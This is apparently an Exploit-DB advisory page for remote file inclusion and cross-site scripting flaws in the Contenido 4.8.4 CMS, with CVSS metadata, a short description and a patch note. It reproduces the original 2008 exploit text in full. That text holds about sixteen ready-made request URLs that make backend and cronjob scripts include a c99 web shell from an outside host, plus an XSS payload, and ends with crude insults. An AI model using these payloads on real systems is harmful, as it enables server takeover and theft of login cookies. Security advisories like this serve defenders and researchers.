Contenido

vendor:

Contenido

by:

RoMaNcYxHaCkEr

9.3

CVSS

HIGH

Multiple Remote Vulne [ RFI + XSS ]

94, 79

CWE

Product Name: Contenido

Affected Version From: 4.8.2004

Affected Version To: 4.8.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:contenido:contenido:4.8.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Multiple Remote File Inclusion (RFI) and Cross-Site Scripting (XSS) vulnerabilities in Contenido 4.8.4 and possibly earlier versions allow remote attackers to execute arbitrary code and steal cookie-based authentication credentials via a URL in the contenido_path parameter to backend_search.php, the cfg[path][contenido] parameter to move_articles.php, move_old_stats.php, optimize_database.php, run_newsletter_job.php, send_reminder.php, session_cleanup.php, and setfrontenduserstate.php, the cfg[path][templates] parameter to include.newsletter_jobs_subnav.php and include.right_top.php, and the c[path][templates] parameter to include.newsletter_jobs_subnav.php and include.right_top.php, and a malicious script in the changelang parameter to front_content.php.

Mitigation:

Upgrade to the latest version of Contenido, or apply the patch from the vendor.

Source

Exploit-DB raw data:

# Script Name :  Contenido

# Type Of Script : Content-Management

# Version : 4.8.4 May Be Older Is Infected I Don,t See !!!

# Download From : http://www.contenido.org/en/upload/versionen/Contenido_4.8.4.zip

# Found : RoMaNcYxHaCkEr              [ RoMaNTiC-TeaM ]

# My Homepage : WwW.4RxH.CoM   & Member From Tryag Forum   [ We Will Be Back Soon ]

# Type Of Exploits : Multiple Remote Vulne [ RFI + XSS ]

# Exploits:

- This Multiple RFI In Different Files :

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/backend_search.php?contenido_path=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=http://rxh.freehostia.com/shells/c99in.txt?

- This Is XSS :

http://WwW.4RxH.CoM/Contenido_4.8.4/contenido/index.php?contenido=>">alert(41197.1507065509)%3B

Also In Different Variable In "Belang" Also "username" By POST method

# This All Above Shit Is EOF ......

# Note : Fuck All Lamerz & Kids ( You Know What I Am Mean . Did You !!! )

# Great To : Unknown Hacker , aLwHeEd , Tryag TeaM And Injector TeaM

# rXh

# bEST wISHES

# milw0rm.com [2008-06-14]